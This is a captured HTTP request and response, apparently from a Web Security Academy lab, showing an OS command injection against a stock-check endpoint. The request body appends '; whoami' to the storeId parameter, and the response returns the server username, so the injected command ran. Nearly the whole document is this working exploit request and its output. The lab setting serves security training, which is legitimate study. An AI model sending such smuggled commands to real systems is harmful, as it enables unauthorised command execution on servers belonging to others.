#Request
POST /product/stock HTTP/2

Host: 0a1000f4049a50ab80ff0d5b0069005f.web-security-academy.net

Cookie: session=a7hUt911Bf2jnkZtzkH7Jwamz3NKBrny

Content-Length: 29

Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"

Sec-Ch-Ua-Platform: "Linux"

Accept-Language: en-US

Sec-Ch-Ua-Mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Origin: https://0a1000f4049a50ab80ff0d5b0069005f.web-security-academy.net

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://0a1000f4049a50ab80ff0d5b0069005f.web-security-academy.net/product?productId=1

Accept-Encoding: gzip, deflate, br

Priority: u=1, i



productId=1&storeId=1; whoami



#Result
HTTP/2 200 OK

Content-Type: text/plain; charset=utf-8

X-Frame-Options: SAMEORIGIN

Content-Length: 16



62
peter-JA8IOa
